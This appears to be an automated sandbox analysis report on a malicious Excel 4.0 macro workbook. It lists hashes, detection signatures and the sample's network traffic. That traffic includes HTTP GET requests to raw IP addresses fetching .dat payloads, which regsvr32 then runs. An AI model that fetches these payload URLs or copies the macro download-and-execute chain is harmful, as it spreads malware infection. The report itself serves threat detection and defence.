Windows Analysis Report ClaimCopy-46148734-12012021.xlsb

Overview

General Information

Sample Name: ClaimCopy-46148734-12012021.xlsb
Analysis ID: 532405
MD5: f1107ae8c76f3ac6c7691fa5a857b206
SHA1: b69597b25562a96547402d9bcadc096a340b8a69
SHA256: 85278a1649ffd17dae84fce72827f804b0091b907efd841ac95f6b4644fd8d5a
Tags: xlsx
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score: 76
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Multi AV Scanner detection for submitted file
Found Excel 4.0 Macro with suspicious formulas
Sigma detected: Microsoft Office Product Spawning Windows Shell
Document exploit detected (process start blacklist hit)
Document exploit detected (UrlDownloadToFile)
Found protected and hidden Excel 4.0 Macro sheet
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Yara detected Xls With Macro 4.0
Potential document exploit detected (performs HTTP gets)
IP address seen in connection with other malware

Classification

AV Detection:

barindex
Multi AV Scanner detection for submitted file
Source: ClaimCopy-46148734-12012021.xlsb ReversingLabs: Detection: 22%
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File opened: C:\Windows\SysWOW64\MSVCR100.dll Jump to behavior

Software Vulnerabilities:

barindex
Document exploit detected (process start blacklist hit)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\regsvr32.exe
Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Section loaded: unknown origin: URLDownloadToFileA Jump to behavior
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.3:49713 -> 185.106.123.73:80
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.3:49716 -> 146.19.170.39:80

Networking:

barindex
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /710276824738.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 146.19.170.39Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /710276824738.dat2 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 146.19.170.39Connection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 146.19.170.39 146.19.170.39
Source: unknown TCP traffic detected without corresponding DNS query: 185.106.123.73
Source: unknown TCP traffic detected without corresponding DNS query: 185.106.123.73
Source: unknown TCP traffic detected without corresponding DNS query: 185.106.123.73
Source: unknown TCP traffic detected without corresponding DNS query: 146.19.170.39
Source: unknown TCP traffic detected without corresponding DNS query: 146.19.170.39
Source: unknown TCP traffic detected without corresponding DNS query: 146.19.170.39
Source: unknown TCP traffic detected without corresponding DNS query: 146.19.170.39
Source: unknown TCP traffic detected without corresponding DNS query: 94.140.114.63
Source: unknown TCP traffic detected without corresponding DNS query: 94.140.114.63
Source: unknown TCP traffic detected without corresponding DNS query: 94.140.114.63
Source: unknown TCP traffic detected without corresponding DNS query: 94.140.114.63
Source: unknown TCP traffic detected without corresponding DNS query: 94.140.114.63
Source: unknown TCP traffic detected without corresponding DNS query: 94.140.114.63
Source: unknown TCP traffic detected without corresponding DNS query: 185.106.123.73
Source: unknown TCP traffic detected without corresponding DNS query: 185.106.123.73
Source: unknown TCP traffic detected without corresponding DNS query: 185.106.123.73
Source: unknown TCP traffic detected without corresponding DNS query: 146.19.170.39
Source: unknown TCP traffic detected without corresponding DNS query: 146.19.170.39
Source: unknown TCP traffic detected without corresponding DNS query: 146.19.170.39
Source: unknown TCP traffic detected without corresponding DNS query: 146.19.170.39
Source: unknown TCP traffic detected without corresponding DNS query: 146.19.170.39
Source: unknown TCP traffic detected without corresponding DNS query: 146.19.170.39
Source: unknown TCP traffic detected without corresponding DNS query: 146.19.170.39
Source: unknown TCP traffic detected without corresponding DNS query: 146.19.170.39
Source: unknown TCP traffic detected without corresponding DNS query: 146.19.170.39
Source: unknown TCP traffic detected without corresponding DNS query: 146.19.170.39
Source: unknown TCP traffic detected without corresponding DNS query: 146.19.170.39
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Dec 2021 07:32:22 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Dec 2021 07:33:26 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: http://146.19.170.39/710276824738.dat
Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: http://146.19.170.39/710276824738.dat2
Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: http://185.106.123.73/710276824738.dat
Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: http://185.106.123.73/710276824738.dat&
Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000003.565213476.0000000012CCA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599282665.0000000012CCA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: http://185.106.123.73/710276824738.dat2
Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: http://185.106.123.73/710276824738.dat25
Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: http://94.140.114.63/710276824738.dat
Source: EXCEL.EXE String found in binary or memory: http://94.140.114.63/710276824738.dat2
Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: http://94.140.114.63/710276824738.dat2e
Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: http://94.140.114.63/710276824738.dat2s
Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: http://94.140.114.63/710276824738.datd
Source: EXCEL.EXE, 00000001.00000003.622996638.000000000F47D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564819624.000000000F47E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599473071.000000000F47E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.754138462.000000000F47D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292418003.000000000F47D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.741498759.000000000F47D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.618708910.000000000F47D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.604793944.000000000F47D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620001254.000000000F47D000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: EXCEL.EXE, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: EXCEL.EXE, 00000001.00000002.754897882.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660254465.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.738795485.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.601531308.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620631853.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599092509.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.291961394.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564407313.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.623747505.0000000012B6C000.00000004.00000001.sdmp String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glidesqz
Source: EXCEL.EXE, 00000001.00000002.751574667.000000000D65E000.00000004.00000001.sdmp String found in binary or memory: http://purl.oclc.org/ooxml/drawingml/diagram
Source: EXCEL.EXE, 00000001.00000002.751492725.000000000D63C000.00000004.00000001.sdmp String found in binary or memory: http://purl.oclc.org/ooxml/drawingml/tableU
Source: EXCEL.EXE, 00000001.00000003.601454443.0000000015BA8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602979936.0000000015B01000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.617660841.0000000015B01000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.601358509.0000000015BEB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.603033362.0000000015B37000.00000004.00000001.sdmp String found in binary or memory: http://schemas.open
Source: EXCEL.EXE, 00000001.00000003.603033362.0000000015B37000.00000004.00000001.sdmp String found in binary or memory: http://schemas.openformatrg/package/2006/content-t
Source: EXCEL.EXE, 00000001.00000003.601454443.0000000015BA8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602979936.0000000015B01000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.617660841.0000000015B01000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.601358509.0000000015BEB000.00000004.00000001.sdmp String found in binary or memory: http://schemas.openformatrg/package/2006/r
Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: http://weather.service.msn.com/data.aspx
Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
Source: EXCEL.EXE, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://addinsinstallation.store.office.com/app/download
Source: EXCEL.EXE, 00000001.00000003.289415064.0000000012BD6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmp String found in binary or memory: https://addinsinstallation.store.office.com/app/downloadAppInfoQuery15https://api.addins.omex.office
Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: https://addinsinstallation.store.office.com/app/downloadx
Source: EXCEL.EXE, 00000001.00000003.604153523.000000000F2F0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.622581671.000000000F2EF000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.565377395.000000000F2FA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.619496038.000000000F2EF000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.618391633.000000000F2EF000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.753326969.000000000F2F0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599684580.000000000F2F9000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
Source: EXCEL.EXE, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticatedTV
Source: EXCEL.EXE, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: EXCEL.EXE, 00000001.00000003.289415064.0000000012BD6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmp String found in binary or memory: https://addinslicensing.store.office.com/commerce/queryDeepLinkingServicehttps://api.addins.store.of
Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: https://addinslicensing.store.office.com/commerce/queryt
